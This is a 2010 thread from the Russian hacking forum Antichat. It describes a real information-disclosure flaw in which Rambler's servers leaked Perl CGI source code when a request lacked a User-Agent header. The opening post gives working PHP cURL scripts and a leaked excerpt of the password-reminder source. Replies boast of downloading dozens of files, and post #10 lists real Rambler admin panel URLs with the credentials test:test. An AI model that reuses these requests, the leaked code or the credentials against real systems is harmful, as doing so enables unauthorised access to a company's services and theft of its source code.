HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Некоторые исходники Рамблера.
  #1  
Старый 19.02.2010, 20:37
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию Некоторые исходники Рамблера.

Совсем нечаянно наткнулся сегодня днем,выкладываю сюда в виде мини статьи.
Запускаем тот скрипт,и смотрим на вывод.
PHP код:
<?php
$exec 
curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($execCURLOPT_RETURNTRANSFER0);
curl_setopt($execCURLOPT_REFERER'http://id-planet.rambler.ru/default/');
curl_setopt($execCURLOPT_HEADER1);
$page curl_exec($exec);
echo 
$page;
?>
Запустив скрипт, я был очень удивлен увиденному, а увидел я следующее(приведен лишь отрывок полного кода):

Код:
#!/usr/bin/perl -w # Password reminder for mail.rambler.ru project # Original version by maniac@rambler-co.ru # Rewritten by Maxim Dounin, mdounin@rambler-co.ru # $Id: reminder.cgi,v 1.35 2009/04/02 18:51:47 citrin Exp $ ###############################################################################
use strict;
use warnings;
use utf8;
use CGI qw/ param /;
use Digest::MD5 qw/ md5_hex /;
use Time::HiRes;
use Rambler::CaptchaManager;
use rutils; use r_icq;
use rcfg;
my $H = { myname => 'reminder.cgi', DEBUG => 0, LOG => $rcfg::logdir.'/reminder/reminder_log', # template, used by rutils::print_tmpl TMPL_ROOT => $rcfg::tmpldir, TMPL => 'reminder.tmpl', SKIN => 'id', SKIN_OPT => { DEFAULT => $rcfg::urls{id}, LOGOUT => 'http://www.rambler.ru/', AUTH => $rcfg::urls{id}.'script/auth.cgi', }, # interface charset CHARSET => 'windows-1251', # ratelimits RATE_LOGIN => { rate => 1/3600, burst => 5 }, RATE_IP => { rate => 1/3600, burst => 10 }, RATE_IP_ROBOT => { rate => 1/60, burst => 50 }....
Собственно после несложного мыслительного процесса, я пришел к выводу, что передо мной исходники страницы Восстановление паролей.

А причина то, смешная!

После небольшого танца вокруг Рамблера, было выявлено еще как минимум 5 скриптов, которые можно скачать таким образом, и мне захотелось узнать с чем это связано.Первой мыслью было, что умер интерпретатор Perl, но из браузера я видел вполне нормальный результат работы скрипта, а не его исходник, значит этот вариант отпадает.Посмотрев заголовки отправляемые браузером сервера Рамблера, были поставлены опыты, и выявлено, что Рамблер показывает исходники некоторых скриптов, если к ним обратиться без заголовка User-Agent: ****.
То есть, вот такое обращение к скрипту:

PHP код:
<?php
$header 
= array('User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8');
$exec curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($execCURLOPT_RETURNTRANSFER0);
curl_setopt($execCURLOPT_REFERER'http://id-planet.rambler.ru/default/');
curl_setopt($execCURLOPT_HEADER1);
curl_setopt($exec,CURLOPT_HTTPHEADER$header);
$page curl_exec($exec);
echo 
$page;
?>
вполне нормальное.Увидим результат работы скрипта.Спасебо досвидания.Я отмечать праздники.
Full version статьи!
Всех с наступающим праздником!
 
Ответить с цитированием

  #2  
Старый 19.02.2010, 21:20
XXI
Banned
Регистрация: 18.02.2010
Сообщений: 20
С нами: 8541679

Репутация: 0
По умолчанию

Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )


Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )
 
Ответить с цитированием

  #3  
Старый 19.02.2010, 21:33
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от XXI  
Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )


Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )
Fail.
 
Ответить с цитированием

  #4  
Старый 19.02.2010, 21:24
Mr.Replica
Участник форума
Регистрация: 18.05.2010
Сообщений: 215
С нами: 8412866

Репутация: 92
По умолчанию

сэнкс чувак...
 
Ответить с цитированием

  #5  
Старый 19.02.2010, 21:31
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
С нами: 9798086

Репутация: 999


По умолчанию

Супер! Действительно работает! Если капнуть, то можно скачать около десятка файлов.
Epic fail...
 
Ответить с цитированием

  #6  
Старый 19.02.2010, 22:14
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

В рамблере остались хоть норм кодеры ? =\
в прошлом году тоже сорцы были в паблике
 
Ответить с цитированием

  #7  
Старый 19.02.2010, 22:16
XXI
Banned
Регистрация: 18.02.2010
Сообщений: 20
С нами: 8541679

Репутация: 0
По умолчанию

Ухах. Скоро рамблеров появится докуя


Я уже 40 исходников скатал )
 
Ответить с цитированием

  #8  
Старый 19.02.2010, 22:20
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от XXI  
Ухах. Скоро рамблеров появится докуя


Я уже 40 исходников скатал )
Где ты там 40 штук-то нашел?)
 
Ответить с цитированием

  #9  
Старый 19.02.2010, 22:23
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
С нами: 10061036

Репутация: 127
По умолчанию

Цитата:
Сообщение от wildshaman  
Где ты там 40 штук-то нашел?)
Он наверное один и тотже качает) (востановление паса из статьи)
 
Ответить с цитированием

  #10  
Старый 19.02.2010, 22:29
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

http://in.fo2.rambler.ru/administrator/ Joomla =)
http://ad.rambler.ru/adm/client/ban.adm?cmd=list&item=bn test:test
http://ad.rambler.ru/adm/admin.adm test:test
http://fo2.rambler.ru/info.php phpinfo
Решето ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
подскажите как собирать исходники 6apa6aIIIka С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5 09.10.2009 14:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...